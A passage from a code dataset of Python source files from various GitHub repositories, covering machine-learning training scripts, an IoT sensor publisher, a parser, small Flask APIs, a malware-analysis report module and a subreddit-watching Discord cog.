sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import train_test_split\n\ndef runLocallyOrRemotely():\n    locally_or_remotely = input(\"Run the code locally? [y/n/wsl]:\")\n    if locally_or_remotely == 'y':\n        repo_location = \"D:/OneDrive - Kyushu University/15_Article/03_RStudio/\"\n        repo_result_location = \"D:/OneDrive - Kyushu University/15_Article/03_RStudio/07_PyResults/\"\n    elif locally_or_remotely == 'n':\n        repo_location = \"/home/usr6/q70176a/DP15/\"\n        repo_result_location = \"/home/usr6/q70176a/DP15/03_Results/\"\n    elif locally_or_remotely == 'wsl':\n        repo_location = \"/mnt/d/OneDrive - Kyushu University/15_Article/03_RStudio/\"\n        repo_result_location = \"/mnt/d/OneDrive - Kyushu University/15_Article/03_RStudio/07_PyResults/\"\n    return repo_location, repo_result_location\n\n# update 2023.1.30\ndef getXandY(Output_Vari):\n    y = pd.read_csv(REPO_LOCATION + \"01_Data/10_y_\" + Output_Vari + \"_29IndVar.csv\", index_col=0)\n    y = y.iloc[:,0].to_numpy().astype('int')\n    X = pd.read_csv(REPO_LOCATION + \"01_Data/09_X_\" + Output_Vari + \"_29IndVar.csv\", index_col=0)\n    return X, y\n\nREPO_LOCATION, REPO_RESULT_LOCATION = runLocallyOrRemotely()\nX, y = getXandY(\"LSoverall\")\n\n\nmodel_cls = RandomForestClassifier(n_estimators=1000, random_state=1,\n                                  n_jobs = -1, oob_score = True) \nmodel_cls.fit(X, y)\nprint(model_cls.oob_score_)\n\nmodel_reg = RandomForestRegressor(n_estimators=1000, random_state=1,\n                                  n_jobs = -1, oob_score = True) \nmodel_reg.fit(X, y)\nprint(model_reg.oob_score_)\n\n\"\"\"\nThis script is to confirm whether cls is better than reg.\nRESULT reg is better\n\"\"\"","repo_name":"MichaelChaoLi-cpu/Greenness_NighttimeLight_WB","sub_path":"06_PyCode/09_TE_CompareClsReg_v1.py","file_name":"09_TE_CompareClsReg_v1.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"69843060371","text":"#import os\n#import socket\n#import SSD1306\n#from machine import ADC\n#from machine import Pin, I2C\nimport time\nimport machine\nimport pycom\nfrom pycoproc_2 import Pycoproc\nfrom mqtt import MQTTClient_lib as MQTTClient\nfrom network import WLAN\nfrom SI7006A20 import SI7006A20\nfrom MPL3115A2 import MPL3115A2,ALTITUDE,PRESSURE\n\n\n\npycom.heartbeat(False)\npycom.rgbled(0xA0009)\nOLED_WIDTH = 128\nOLED_HEIGHT = 64\npy = Pycoproc()\n\nwlan = WLAN(mode=WLAN.STA)  # assumed: create the WLAN interface in station mode before checking the link\nif wlan.isconnected():\n    pycom.rgbled(0x000F00)\nelse:\n    pycom.rgbled(0x0F000)\n\n\"\"\"\n#I2C\ni2c = I2C(0)\ni2c = I2C(0, I2C.MASTER)\ni2c = I2C(0, pins=('P9','P10')) # create and use default PIN assignments (P9=SDA, P10=SCL)\ni2c.init(I2C.MASTER, baudrate=10000) # init as a master\n\"\"\"\n\n#Internal temp\nsi = SI7006A20(py)\nmp = MPL3115A2(py,mode=ALTITUDE) # Returns height in meters. Mode may also be set to PRESSURE, returning a value in Pascals\nmpp = MPL3115A2(py,mode=PRESSURE) # Returns pressure in Pa. 
Mode may also be set to ALTITUDE, returning a value in meters\n\n\n#MQTT\ndef sub_cb(topic, msg):\n print(msg)\n\nclient = MQTTClient(\"sensor\", \"192.168.10.30\", port=1883, keepalive=300)\nclient.set_callback(sub_cb)\nclient.connect()\n\n\n\"\"\"\n#initalize the ssd1306 oled screen\noled = SSD1306.SSD1306_I2C(OLED_WIDTH, OLED_HEIGHT, i2c)\nblack = 0x000000 # black color\n\n# draw a black rectangle as a way to clear the screen\ndef clear_oled(oled):\n oled.fill_rect(0,0,OLED_WIDTH,OLED_HEIGHT,black)\n\"\"\"\n\nwhile True:\n temperature = si.temperature()\n altitude = mp.altitude()\n pressure = mpp.pressure()\n humidity = si.humidity()\n dew_point = si.dew_point()\n battery_left = py.read_battery_voltage()\n client.publish(topic=\"Temperature\", msg=str(temperature))\n client.publish(topic=\"Altitude\", msg=str(altitude))\n client.publish(topic=\"Pressure\", msg=str(pressure))\n client.publish(topic=\"humidity\", msg=str(humidity))\n client.publish(topic=\"Dew_point\", msg=str(dew_point))\n client.publish(topic=\"Battery\", msg=str(battery_left))\n time.sleep(300)\n\n #time.sleep(5)\n #clear_oled(oled)\n #oled.text(str(celcius), 0, 0)\n #oled.show()\n #clear_oled(oled)\n","repo_name":"granback/IoT","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23242330739","text":"import os\nfrom typing import Tuple, Sequence, Callable\nimport csv\nimport numpy as np\nfrom PIL import Image\nimport torch\nimport torch.optim as optim\nfrom torch import nn, Tensor\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchinfo import summary\nfrom torchvision import transforms\nimport random\nfrom efficientnet_pytorch import EfficientNet\n\nseed = 0\nrandom.seed(seed)\nnp.random.seed(seed)\nos.environ[\"PYTHONHASHSEED\"] = str(seed)\ntorch.manual_seed(seed)\ntorch.cuda.manual_seed(seed)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = True\n\n\nclass MnistDataset(Dataset):\n def __init__(\n self,\n dir: os.PathLike,\n image_ids: os.PathLike,\n transforms: Sequence[Callable]\n ) -> None:\n self.dir = dir\n self.transforms = transforms\n self.labels = {}\n\n with open(image_ids, 'r') as f:\n reader = csv.reader(f)\n next(reader)\n for row in reader:\n self.labels[int(row[0])] = list(map(int, row[1:]))\n\n self.image_ids = list(self.labels.keys())\n\n def __len__(self) -> int:\n return len(self.image_ids)\n\n def __getitem__(self, index: int) -> Tuple[Tensor]:\n image_id = self.image_ids[index]\n image = Image.open(\n os.path.join(\n self.dir, f'{str(image_id).zfill(5)}.png')).convert('RGB')\n\n target = np.array(self.labels.get(image_id)).astype(np.float32)\n\n if self.transforms is not None:\n image = self.transforms(image)\n\n return image, target\n\n\ntransforms_train = transforms.Compose([\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.RandomVerticalFlip(p=0.5),\n transforms.RandomAffine(random.randint(0, 360)),\n transforms.ColorJitter(contrast=(0.2, 3)),\n transforms.ToTensor(),\n transforms.Normalize(\n [0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225]\n )\n])\n\ntransforms_validation = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(\n [0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225]\n )\n])\n\ntransforms_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(\n [0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225]\n )\n])\n\ntrainset = MnistDataset('data/train', 
'data/dirty_mnist_answer.csv', transforms_train)\nvalidationset = MnistDataset('data/validation', 'data/dirty_mnist_answer-validation.csv', transforms_test)\ntestset = MnistDataset('data/test', 'data/sample_submission.csv', transforms_test)\n\ntrain_loader = DataLoader(trainset, batch_size=8, num_workers=2)\nvalidation_loader = DataLoader(validationset, batch_size=8, num_workers=2)\ntest_loader = DataLoader(testset, batch_size=8, num_workers=2)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nprint(device)\n\nmodel = EfficientNet.from_pretrained(\"efficientnet-b7\", num_classes=26)\nmodel = nn.DataParallel(model).to(device)\nprint(summary(model, input_size=(1, 3, 256, 256), verbose=0))\n\noptimizer = optim.Adam(model.parameters(), lr=1e-3)\ncriterion = nn.MultiLabelSoftMarginLoss()\n\nnum_epochs = 60\n\nmodel.train()\ntest_result = [] # validation 결과 모아서 보기\n\npath = \"./efficientnets/\"\n\nfor epoch in range(num_epochs):\n for i, (images, targets) in enumerate(train_loader):\n optimizer.zero_grad()\n\n images = images.to(device)\n targets = targets.to(device) \n outputs = model(images)\n \n loss = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n \n if (i+1) % 10 == 0: \n outputs = outputs > 0.5\n acc = (outputs == targets).float().mean()\n print(f'{epoch}: {loss.item():.5f}, {acc.item():.5f}')\n\n model.eval()\n batch_size = test_loader.batch_size\n batch_index = 0\n valid_count = 0\n\n for i, (images, targets) in enumerate(validation_loader):\n images = images.to(device)\n targets = targets.to(device)\n outputs = model(images)\n loss = criterion(outputs, targets)\n result = str(epoch) + \" : \" + str(loss.item())\n test_result.append(result)\n outputs = outputs > 0.5\n batch_index = i * batch_size\n acc = (outputs == targets).float().mean()\n \n \n valid_count += 1\n if valid_count == 5:\n break\n\n print(\"valid\", f'{epoch}: {loss.item():.5f}, {acc.item():.5f}')\n\n torch.save(model, path+\"epoch\"+str(epoch)+\".pt\")\n model.train()\n \nprint(test_result)","repo_name":"Dacon-ISYS/Dacon-Dirty-Alphabet-Mnist","sub_path":"save_per_epoch_efficientnet.py","file_name":"save_per_epoch_efficientnet.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"14299226684","text":"from invalid_symbol_error import InvalidSymbolError\nfrom ll1_table import terminals, table\nfrom sys import argv\n\nclass Parser():\n\n def __init__(self, table, terminals):\n self.table = table\n self.variables = list(table.keys())\n self.terminals = terminals # make this simple, and just find the lowercase things\n\n def get_terminals(self):\n return self.terminals\n\n def get_variables(self):\n return self.variables\n\n def __format_string(self, string):\n return string.replace(' ', '').replace('\\n', '') + '$'\n\n def validate(self, string):\n string = self.__format_string(string)\n\n if len(list(filter(lambda input_char : input_char not in self.terminals, string[:len(string)-1]))) != 0:\n raise InvalidSymbolError(\"ERROR_INVALID_SYMBOL\")\n\n stack = [\"$\", \"S\"]\n for i, char in enumerate(string):\n\n print('{:<25} {}'.format(string[i:], ''.join(stack[::-1])))\n\n if len(stack) == 0:\n return False # unread input\n\n # apply production rules until top of stack is no longer a variable\n while stack[-1] in self.variables:\n production = self.table[stack[-1]].get(char, None)\n if production is None:\n return False\n else:\n stack.pop()\n # push right hand side of productions 
to stack, ignore '' (epsilon)\n stack.extend(list(filter(lambda alpha : alpha != '', production))[::-1])\n\n print('{:<25} {}'.format(string[i:], ''.join(stack[::-1])))\n\n if stack[-1] in self.terminals and stack[-1] == char:\n stack.pop()\n else:\n return stack[-1] == char and stack[-1] == '$' and stack[-1] not in self.terminals\n\n return False\n\n\n\n\ndef main():\n\n if len(argv) < 2:\n print(\" File path to string required as argument\")\n quit()\n\n parser = Parser(table, terminals)\n\n try:\n string = open(argv[1]).read().replace('\\n', '').replace(\" \", \"\")\n except FileNotFoundError as e:\n print(\"Invalid file path\")\n quit()\n except Exception as e:\n print(e.__repr__())\n quit()\n\n try:\n print(\"ACCEPTED\") if parser.validate(string) else print(\"REJECTED\")\n except InvalidSymbolError as e:\n print(e.__str__())\n except Exception as e:\n print(e.__repr__())\n return\n\nif __name__ == '__main__':\n main()\n","repo_name":"EricNRodriguez/LL-1-Table-Driven-Parser","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43616498199","text":"\"\"\"\nTests relating to record metadata.\n\n- Setting the 'outcome' attribute.\n\"\"\"\nimport os\nimport sys\nfrom pathlib import Path\nos.chdir(Path(__file__).parent)\nfrom utils_for_testing import clean_project\n\ndef test_outcome():\n\n projectroot = Path(__file__).parent/\"test_project\"\n projectpath = str(projectroot.absolute())\n if str(projectpath) not in sys.path:\n sys.path.insert(0, projectpath)\n\n # Clear the runtime directory and cd into it\n clean_project(projectroot)\n os.makedirs(projectroot/\"data\", exist_ok=True)\n os.chdir(projectroot)\n\n # Define a task which takes different outcomes\n from tasks import Polar\n task_succeed = Polar(x=1, y=0, reason=\"pytest\")\n task_undefined = Polar(x=0, y=0, reason=\"pytest\")\n\n task_succeed.run()\n task_undefined.run()\n\n from smttask.view import RecordStoreView\n RecordStoreView.default_project_dir = projectpath\n recordlist = RecordStoreView().list\n # Most recent records come first\n assert \"undefined\" in recordlist[0].outcome\n assert \"undefined\" not in recordlist[1].outcome\n","repo_name":"alcrene/smttask","sub_path":"tests/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"8739564130","text":"# Short Version\r\nimport turtle\r\nimport random\r\nimport subprocess\r\ns = turtle.getscreen()\r\ns.setup(width=1000, height=1000)\r\nt = turtle\r\n\r\nt.penup()\r\nt.goto(0,-400)\r\nt.pendown()\r\nt.speed(1) # This is the slowest that it will draw\r\n\t\t# Speeds go 1 to 10, and then supefast is zero\r\nt.pensize(5)\r\nt.circle(420)\r\nt.pensize(2)\r\nt.speed(0) # This is the fastest that it will draw\r\nt.left(90)\r\nt.forward(380)\r\nt.right(90)\r\nt.circle(40, 22.5)\r\n\r\nfor i in range(15): # This is a function that gets repeated 15 times\r\n\t\t\t\t\t# that way you don't have to copy the code 15-times...☺\r\n\tt.right(90)\r\n\tt.forward(380)\r\n\tt.left(180)\r\n\tt.forward(380)\r\n\tt.right(90)\r\n\tt.circle(40, 22.5)\r\n\r\nt.right(90)\r\nt.forward(340)\r\nt.left(90)\r\nt.circle(380)\r\n\r\nt.done()","repo_name":"Chrisdontm/Short_Version","sub_path":"Short version.py","file_name":"Short 
version.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74552114769","text":"# main.py\nfrom flask import Flask, request, jsonify\nfrom application.campaign_service import CampaignService\nfrom infrastructure.adapters.firebase_campaign_repository import FirebaseCampaignRepository\n\napp = Flask(__name__)\ncampaign_repository = FirebaseCampaignRepository()\ncampaign_service = CampaignService(campaign_repository)\n\n@app.route('/backoffice/campaigns/newCampaign', methods=['POST'])\ndef create_campaign():\n try:\n campaign_data = request.get_json()\n print(\"DATA :\", campaign_data)\n campaign_service.create_campaign(campaign_data)\n return jsonify({'status': 'success', 'data': campaign_data}), 201\n except Exception as e:\n print(f\"Error creating campaign: {e}\")\n return jsonify({'status': 'error', 'message': 'Internal Server Error'}), 500\n\n@app.route('/backoffice/campaigns/update/', methods=['PATCH'])\ndef update_campaign(campaign_id):\n try:\n campaign_data = request.get_json()\n campaign_service.update_campaign(campaign_id, campaign_data)\n return jsonify({'status': 'success', 'message': 'Campaign updated successfully.'}), 200\n except Exception as e:\n print(f\"Error updating campaign: {e}\")\n return jsonify({'status': 'error', 'message': 'Internal Server Error'}), 500\n \n@app.route('/backoffice/campaign/', methods=['GET'])\ndef get_campaign(campaign_id):\n try:\n campaign = campaign_service.get_campaign(campaign_id)\n if campaign:\n return jsonify({'status': 'success', 'data': campaign}), 200\n else:\n return jsonify({'status': 'not found', 'message': 'Campaign not found'}), 404\n except Exception as e:\n print(f\"Error retrieving campaign: {e}\")\n return jsonify({'status': 'error', 'message': 'Internal Server Error'}), 500 \n \n@app.route('/backoffice/campaign/', methods=['GET'])\ndef get_all_campaigns():\n try:\n campaigns = campaign_service.get_all_campaigns()\n return jsonify({'status': 'success', 'data': campaigns}), 200\n except Exception as e:\n print(f\"Error retrieving campaigns: {e}\")\n return jsonify({'status': 'error', 'message': 'Internal Server Error'}), 500 \nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n","repo_name":"LuiggiPasacheL/CanjeXpress_G4","sub_path":"backend/backoffice/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5720119972","text":"\ndef SieveOfEratosthenes(num):\n res = []\n boolArr = [True for _ in range(num+1)]\n val = 2\n while val*val <= num:\n if boolArr[val]:\n for p in range(val*val,num+1,val):\n boolArr[p] = False\n val += 1\n for p in range(2,num+1):\n if boolArr[p] == True:\n res.append(p)\n return res\n\nif __name__=='__main__':\n print(SieveOfEratosthenes(20))","repo_name":"chaitanyatyagi/Important-Algorithms","sub_path":"Basic-Algo/sieve_of_eratosthenes.py","file_name":"sieve_of_eratosthenes.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33541519860","text":"#from flask import Flask, request, jsonify\nfrom flask import Flask,request,jsonify\nfrom flask_cors import CORS\nfrom nosql import *\n\n#crea una instancia de la clase Flask\nservidor = Flask(__name__)\nCORS(servidor)\n\n#---[Prueba]--------------------------\n@servidor.route(\"/prueba\")\ndef prueba():\n return \"Ok, 
success on the server\"\n\n#---[GET] : query ----------------\n@servidor.route(\"/mas_recientes\", methods=['GET'])\ndef consultaProductos():\n    #datos = {'respuesta': 'To be implemented'}\n    nosql = NOSQL()\n    datos = nosql.consultar('productos')\n\n    return jsonify({'message': 'Operation successful',\n                    'object': 'list to dictionary',\n                    'data': datos}),200\n\n#---[POST] : add ---------------\n@servidor.route(\"/mas_recientes\", methods=['POST'])\ndef adicionarProductos():\n    datos = request.json\n\n    nosql = NOSQL()\n    nosql.insert('productos', datos['codigo'], datos)\n\n    #print(datos)\n    return jsonify({'message': 'Operation successful',\n                    'object': 'text',\n                    'data': 'Ok'}),200\n\n#---[PUT] : update\n@servidor.route(\"/mas_recientes\", methods=['PUT'])\ndef actualizarProductos():\n    nosql = NOSQL()\n    datos = request.json\n    nosql.update('productos',datos['codigo'],'precio', datos['precio']) \n    #print(datos)\n    return jsonify({'message': 'Operation successful',\n                    'object': 'text',\n                    'data': 'Ok'}),200 \n\n#-------------------------------------\nif __name__ == '__main__':\n    servidor.run(debug=True)\n\n","repo_name":"David-ctrlDev/apipy","sub_path":"servidor/servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74594434407","text":"from torch import nn\n\nfrom ..model.take_first_module import TakeFirst\n\n\n# A PyTorch LSTM model designed for computing a steering angle based on\n# a constantly changing line of best fit of the center of the road\n# Created by brendon-ai, January 2018\n\n\n# Main function to create model using the number of training timesteps\ndef lstm_steering_model():\n    # Create the neural network model using an LSTM followed by fully connected layers\n    model = nn.Sequential(\n        nn.LSTM(input_size=2, hidden_size=10, num_layers=1),\n        TakeFirst(),\n        nn.ReLU(),\n        nn.Linear(10, 4),\n        nn.ReLU(),\n        nn.Linear(4, 1)\n    )\n\n    return model\n","repo_name":"bfmat/LaneDetection","sub_path":"model/lstm_steering_model.py","file_name":"lstm_steering_model.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"6332936471","text":"import pickle\nimport numpy as np\n\nmodel_file_ben = \"wrapper2/ben_r2_0828.mdr\"\nload_ben = pickle.load(open(model_file_ben, 'rb'))\n\nx = load_ben.__reduce__()\n\nes = load_ben.estimators_\n\ndef val_fmt(x):\n    if isinstance(x, str):\n        return x\n    return float(\"{0:.4f}\".format(x))\n\nimport json\n\n\ntrees = []\nfor esi in es:\n    # print(esi.tree_.__reduce__())\n    d = esi.tree_.__getstate__()\n    nodes = d['nodes']\n    for nodei in nodes:\n        nodei['lb'] = list(map(lambda xi: val_fmt(xi), nodei['lower_bounds'].tolist()))\n        nodei['ub'] = list(map(lambda xi: val_fmt(xi), nodei['upper_bounds'].tolist()))\n        nodei['ta'] = val_fmt(\"inf\" if nodei['tau'] == np.inf else nodei['tau'])\n        nodei['vr'] = val_fmt(nodei['variance'])\n        nodei['lc'] = nodei['left_child']\n        nodei['rc'] = nodei['right_child']\n        nodei['f'] = nodei['feature']\n        nodei['th'] = val_fmt(nodei['threshold'])\n\n        del nodei['lower_bounds']\n        del nodei['upper_bounds']\n        del nodei['tau']\n        del nodei['variance']\n        del nodei['left_child']\n        del nodei['right_child']\n        del nodei['feature']\n        del nodei['threshold']\n\n        del nodei['impurity']\n        del nodei['n_node_samples']\n        del nodei['weighted_n_node_samples']\n\n    values = d['values']\n    d['values'] = [val_fmt(di[0][0]) for di in values]\n    
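    # Summary of the compact per-node schema produced above: lb/ub hold the
    # per-feature lower/upper bounds, ta is tau (np.inf encoded as the string
    # \"inf\" by val_fmt), vr is the variance, lc/rc are the left/right child
    # indices, and f/th are the split feature index and threshold; d['values']
    # keeps one formatted prediction value per node.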
trees.append(d)\n\njstr = json.dumps(trees)\n\nwith open('wrapper2/ben_r2_0828_2.mdr.json', 'w') as f:\n f.write(jstr)\n","repo_name":"wlu-mstr/mondrianforest-regression-prediction","sub_path":"src/main/resources/pickle_to_json.py","file_name":"pickle_to_json.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2316567407","text":"\"\"\"\nJsBeautifier Docker class\n\n\"\"\"\n\n__author__ = \"Valentin Giannini\"\n__copyright__ = \"Copyright 2016, LAMA\"\n__credits__ = [\"\"]\n__license__ = \"GPL\"\n__version__ = \"3\"\n__maintainer__ = \"Valentin Giannini - CSE Team\"\n__email__ = \"cse.contact -at- post.lu\"\n__status__ = \"Production\"\n\n\nimport json\nimport base64\n\nfrom html import escape\n\nfrom lama.utils.type import Type\nfrom lama.analyzer.module import Module\nfrom lama.analyzer.docker_module import DockerModule\nfrom lama.models.indicator import Indicator\n\n\nclass JsBeautifierDocker(DockerModule):\n \"\"\"JsBeautifierDocker class\n\n Args :\n **malware** (malware) : Malware which will be analyzed\n \"\"\"\n\n _module_name = \"JS Beautifier\"\n\n def __init__(self, malware, local_path):\n super().__init__(\"JS Beautifier\", malware, local_path, \"jsbeautifier\")\n\n @Module.dec_parse_result\n def parse_result(self):\n \"\"\"\n Abstract parse_result method.\n It calls when analyze is finished.\n It uptade malware with indicators.\n \"\"\"\n if not self._result:\n return\n\n json_jsbeautify = self.json_decode(self._result)\n if not json_jsbeautify:\n return\n\n if 'code' in json_jsbeautify:\n indicator = Indicator.factory(module_cls_name=self.module_cls_name,\n name=\"code\",\n content_type=Type.BASE64,\n content=json_jsbeautify[\"code\"],\n score=0)\n self._malware.get_module_status(self.module_cls_name\n ).add_indicator(indicator)\n if 'error' in json_jsbeautify:\n indicator = Indicator.factory(module_cls_name=self.module_cls_name,\n name=\"error\",\n content_type=Type.BASE64,\n content=json_jsbeautify[\"error\"],\n score=-1)\n self._malware.get_module_status(self.module_cls_name\n ).add_indicator(indicator)\n\n def html_report(content):\n html = \"
        \"\n for item in content:\n if item.name == \"code\":\n html += \"
        {}
        \".format(escape(base64.b64decode(item.content).decode('utf-8')))\n elif item.name == \"error\":\n html += \"
        {}
        \".format(escape(base64.b64decode(item.content).decode('utf-8')))\n else:\n html += \"LAMA PARSE ERROR\"\n html += \"
        \"\n return html\n","repo_name":"post-cyberlabs/lama","sub_path":"lama/analyzer/modules/jsbeautifier_docker.py","file_name":"jsbeautifier_docker.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"30724164499","text":"from datetime import timedelta, datetime\nimport logging\nfrom typing import List, Dict, Sequence, Set, Iterable, Tuple, AsyncGenerator\n\nimport discord\nfrom discord.ext import commands\n\nfrom kaztron import KazCog, task\nfrom kaztron.config import SectionView\nfrom kaztron.driver import reddit\nfrom kaztron.utils.checks import mod_only\nfrom kaztron.utils.containers import FifoCache\nfrom kaztron.utils.datetime import format_timedelta, utctimestamp\n\nfrom kaztron.utils.embeds import EmbedSplitter\nfrom kaztron.utils.strings import format_list, natural_truncate\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_reddit_scopes():\n return 'identity', 'read'\n\n\nclass SubwatchConfig(SectionView):\n \"\"\"\n :ivar reddit_username: Username to use. If not specified, will use the first logged-in user.\n :ivar check_interval: How often to check a subreddit for new posts.\n :ivar min_post_interval: Minimum time between posts to Discord.\n If more than max_posts_per_interval new Reddit posts are detected, they will be queued up\n and posted at this interval.\n :ivar max_posts_per_interval: Maximum number of Reddit posts to post to Discord at a time. If\n more Reddit posts are detected, they will be queued up and posted every min_post_interval.\n \"\"\"\n reddit_username: str\n check_interval: timedelta\n min_post_interval: timedelta\n max_posts_per_interval: int\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.set_converters('check_interval', self._get_timedelta, self._set_timedelta)\n self.set_converters('min_post_interval', self._get_timedelta, self._set_timedelta)\n\n @staticmethod\n def _get_timedelta(seconds: int):\n return timedelta(seconds=seconds)\n\n @staticmethod\n def _set_timedelta(d: timedelta):\n return d.total_seconds()\n\n\nclass SubwatchChannel:\n def __init__(self, *,\n subreddits: Sequence[str],\n queue: List[str]=tuple(),\n last_posted: datetime):\n self.subreddits = tuple(subreddits)\n self.queue = list(queue)\n self.last_posted = last_posted\n\n def to_dict(self):\n return {\n 'subreddits': self.subreddits,\n 'queue': self.queue,\n 'last_posted': utctimestamp(self.last_posted)\n }\n\n @staticmethod\n def from_dict(data: dict):\n return SubwatchChannel(subreddits=data['subreddits'], queue=data.get('queue', []),\n last_posted=datetime.utcfromtimestamp(data['last_posted']))\n\n\nclass SubwatchState(SectionView):\n \"\"\"\n :ivar queue: Queue of reddit submission IDs for each Discord channel.\n :ivar watch: Discord channels and the subreddit(s) they subwatch.\n \"\"\"\n channels: Dict[discord.Channel, SubwatchChannel]\n last_checked: datetime\n no_results_count: int\n cog: KazCog\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.__dict__['cog'] = None\n self.set_converters('channels', self._get_channels, self._set_channels)\n self.set_converters('last_checked', datetime.utcfromtimestamp, utctimestamp)\n\n def set_cog(self, cog: KazCog):\n self.__dict__['cog'] = cog\n\n def _get_channels(self, data: Dict[str, dict]):\n return {self.cog.get_channel(key): SubwatchChannel.from_dict(channels_dict)\n for key, channels_dict in data.items()}\n\n @staticmethod\n def _set_channels(data: 
Dict[discord.Channel, SubwatchChannel]):\n return {ch.id: sub.to_dict() for ch, sub in data.items()}\n\n\nclass RedditStreamManager:\n \"\"\"\n Helps manage and cache the submissions stream. Also manages stream failures (e.g. when the\n last retrieved post is deleted, the stream may return no results instead of the latest results\n since the last query).\n\n :param reddit: Reddit instance to use\n :param subreddits: List of subreddit names to check\n :param renewal_threshold: Number of times the stream is checked with no results before\n automatically refreshing (i.e. assumed stream failure).\n \"\"\"\n def __init__(self,\n reddit_: reddit.Reddit,\n subreddits: Iterable[str],\n renewal_threshold=5,\n cache_expiry=180):\n self.reddit = reddit_\n\n self._subreddits = tuple(subreddits)\n self._stream = None\n self._is_fresh = True\n self.no_result_count = 0\n self.renewal_threshold = renewal_threshold\n\n self.submission_cache = FifoCache() # type: Dict[str, Tuple[reddit.models.Submission, int]]\n self.cache_expiry_delta = cache_expiry\n\n @property\n def subreddits(self):\n \"\"\"\n List of subreddit names for this stream. If this list is modified, the stream is refreshed.\n \"\"\"\n return self._subreddits\n\n @subreddits.setter\n def subreddits(self, subreddits: Iterable[str]):\n self._subreddits = tuple(subreddits)\n self.refresh()\n\n @property\n def is_fresh(self):\n \"\"\"\n True if the stream is fresh, i.e., will return a backlog. This property remains true until\n the stream has iterated through the first set of responses from the API, i.e.,\n :meth:`~.stream` has iterated through to its end.\n \"\"\"\n return self._is_fresh\n\n async def stream(self) -> AsyncGenerator[reddit.models.Submission, None]:\n \"\"\"\n Generator of new reddit posts. 
Should be async iterated.\n\n After a :meth:`~.refresh()`, setting :attr:`~.subreddits`, or hitting the\n :attr:`~.renewal_threshold`, this will load a number of recent posts instead of restarting\n from the latest post.\n \"\"\"\n has_results = False\n if self.is_fresh:\n sr = await self.reddit.subreddit(display_name='+'.join(self.subreddits))\n self._stream = sr.stream.submissions(pause_after=0)\n\n async for submission in self._stream:\n if submission is None:\n if has_results:\n self.no_result_count = 0\n else:\n self.no_result_count += 1\n break\n has_results = True\n self.submission_cache[submission.id] = (submission, utctimestamp(datetime.utcnow()))\n yield submission\n\n self._is_fresh = False\n if self.no_result_count >= self.renewal_threshold:\n self.refresh()\n\n def refresh(self):\n self._stream = None\n self._is_fresh = True\n\n async def get_submission(self, reddit_id: str) -> reddit.models.Submission:\n \"\"\"\n Get the submission from cache or from the reddit API (if not in cache or expired).\n :param reddit_id:\n :return:\n :raise reddit.DeletedError: submission is removed/deleted\n \"\"\"\n try:\n s, load_time = self.submission_cache[reddit_id]\n if utctimestamp(datetime.utcnow()) - load_time > self.cache_expiry_delta:\n await s.load()\n self.submission_cache[reddit_id] = (s, utctimestamp(datetime.utcnow()))\n except KeyError:\n s = await self.reddit.submission(reddit_id)\n self.submission_cache[reddit_id] = (s, utctimestamp(datetime.utcnow()))\n\n if getattr(s, 'removed_by_category', None) is not None:\n raise reddit.DeletedError(s, s.removed_by_category)\n elif not getattr(s, 'is_robot_indexable', True):\n raise reddit.DeletedError(s, 'unknown')\n return s\n\n\nclass QueueManager:\n \"\"\"\n Manage a queue of subreddit posts found and not yet posted.\n\n Note: this class's methods will not mark dirty or write the state file. All mutating methods\n should be called under `with self.cog_state:` contexts to ensure the file is properly updated.\n \"\"\"\n\n def __init__(self, state: SubwatchState):\n self.state = state\n\n def add(self, submission: reddit.models.Submission):\n \"\"\" Add a submission to the queue. \"\"\"\n for ch, ch_info in self.state.channels.items():\n if submission.subreddit.display_name.lower() in ch_info.subreddits:\n ch_info.queue.append(submission.id)\n\n def pop(self, channel: discord.Channel) -> str:\n \"\"\"\n Pop a reddit ID off the channel's queue.\n :raise IndexError: Nothing in queue\n :raise KeyError: Channel is not configured for 